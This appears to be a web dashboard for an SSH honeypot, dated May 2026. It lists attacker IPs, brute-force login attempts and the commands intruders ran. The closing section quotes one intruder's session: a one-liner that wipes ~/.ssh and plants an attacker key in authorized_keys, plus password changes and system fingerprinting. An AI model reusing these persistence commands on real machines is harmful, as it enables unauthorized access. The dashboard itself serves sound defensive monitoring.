Honeypot Dashboard

🌍 Attack Origins

🏆 Top Attackers

Attacker	Origin	ISP	Attempts
rogue_root 10.0.28.1	🏴 Unknown	Unknown	183
stroopwafel_sol 2.57.122.238	🇳🇱 Amsterdam	Unmanaged LTD	26
rogue_root_2 152.32.130.144	🇭🇰 Hong Kong	UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED	25
fog_root 2.57.121.112	🇬🇧 Rushden	Unmanaged LTD	5
tea 2.57.121.25	🇬🇧 Rushden	Unmanaged LTD	5
pretzel 213.209.159.56	🇩🇪 Augsburg	Feo Prest SRL	5
rogue_root_3 167.172.64.25	🇸🇬 Singapore	DigitalOcean, LLC	4
ghost_root 185.225.41.192	🇸🇾 Damascus	sy-samaweb	3
rogue_root_4 161.132.53.175	🇵🇪 Santa	Red Cientifica Peruana	2
specter_root 178.20.210.185	🇰🇿 Būlaevo	Shereverov Marat Ahmedovich	1

📡 Recent Activity

2026-05-04 01:55:06 rogue_root 10.0.28.1 Login attempt: root/

2026-05-04 01:55:04 rogue_root 10.0.28.1 Login attempt: root/

2026-05-04 01:54:36 ghost_root 185.225.41.192 ✅ LOGIN SUCCESS: root/root@2024

2026-05-04 01:54:03 rogue_root 10.0.28.1 Login attempt: root/

2026-05-04 01:53:50 rogue_root_2 152.32.130.144 Login attempt: user7/password

2026-05-04 01:53:41 ghost_root 185.225.41.192 Login attempt: root/QAZ123

2026-05-04 01:53:02 rogue_root 10.0.28.1 Login attempt: root/

2026-05-04 01:53:01 rogue_root 10.0.28.1 Login attempt: root/

2026-05-04 01:52:58 rogue_root_2 152.32.130.144 Login attempt: dev/ved

2026-05-04 01:52:06 rogue_root_2 152.32.130.144 Login attempt: postgres/asd123

2026-05-04 01:52:04 rogue_root 10.0.28.1 Login attempt: root/

2026-05-04 01:52:01 rogue_root 10.0.28.1 Login attempt: root/

2026-05-04 01:51:12 rogue_root_2 152.32.130.144 Login attempt: postgres/asdasd

2026-05-04 01:51:04 rogue_root 10.0.28.1 Login attempt: root/

2026-05-04 01:51:02 rogue_root 10.0.28.1 Login attempt: root/

2026-05-04 01:50:40 ghost_root 185.225.41.192 Login attempt: root/@admin123

2026-05-04 01:50:19 rogue_root_2 152.32.130.144 Login attempt: testx/testx

2026-05-04 01:50:03 rogue_root 10.0.28.1 Login attempt: root/

🎬 Greatest Hits

🏴 rogue_root

183 attempts · 1 sessions · 2 cmds

Brief visit. Ran a command or two and bounced.

⏰ 19:28–20:55

🇳🇱 stroopwafel_sol

26 attempts · 1 sessions · 1 cmds

Casing the joint: pulled system info to see what they're working with.

⏰ 19:43–20:43

🇭🇰 rogue_root_2

25 attempts · 1 sessions · 20 cmds

First thing they did? See if the hardware's worth compromising.

⏰ 20:01–20:53

🇬🇧 fog_root

5 attempts

Brute-force scanner (mixed credentials). 5 attempts with combos like admin:11041995, admin:110378, admin:110376, admin:110294, admin:110275.

⏰ 19:39–19:39

🇬🇧 tea

5 attempts

Brute-force scanner (mixed credentials). 5 attempts with combos like user:131085, user:13101981, user:13101980, user:130790, user:13051978.

⏰ 19:55–19:55

🇩🇪 pretzel

5 attempts

Brute-force scanner (mixed credentials). 5 attempts with combos like jerrod:jerrod, jerrod:jerrod1, jerrod:jerrod123, jerrod:jerrod1234, jerrod:jerrod12345.

⏰ 20:30–20:30

🔑 Top Credentials

📈 Attack Timeline

📊 Daily Breakdown

Date	Sessions	Login Attempts	Successful	Unique IPs	Commands	Top Attacker
2026-05-04	274	264	12	19	23	rogue_root (10.0.28.1)

📊 All-Time Stats

264.0

Attacks / Day

12

Countries Seen

01:00–02:00

Peak Hour (ET)

05-04

Busiest Day (264 attempts)

264 total attempts across 1 days · 4.5% success rate

💀 Successful Logins — What They Did

🎭 rogue_root_2 (152.32.130.144) — Hong Kong, Hong Kong · 1 session · 20 cmds

2026-05-03 20:37 EDT · as test/test000

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling

$ echo -e "test000\nZ0uJ5L6ains7\nZ0uJ5L6ains7"|passwd|bash

$ Enter new UNIX password:

$ echo "test000\nZ0uJ5L6ains7\nZ0uJ5L6ains7\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l // persistence setup

$ w // logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling

$ top // process monitoring

$ uname // OS identification

$ uname -a // OS/kernel identification

$ whoami // privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 stroopwafel_sol (2.57.122.238) — Amsterdam, The Netherlands · 1 session · 1 cmd

2026-05-03 20:25 EDT · as solv/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m // obfuscated system check

🎭 rogue_root (10.0.28.1) — Unknown · 1 session · 2 cmds

2026-05-03 19:32 EDT · as root/password

sudo → exit

$ sudo echo hello testing

$ exit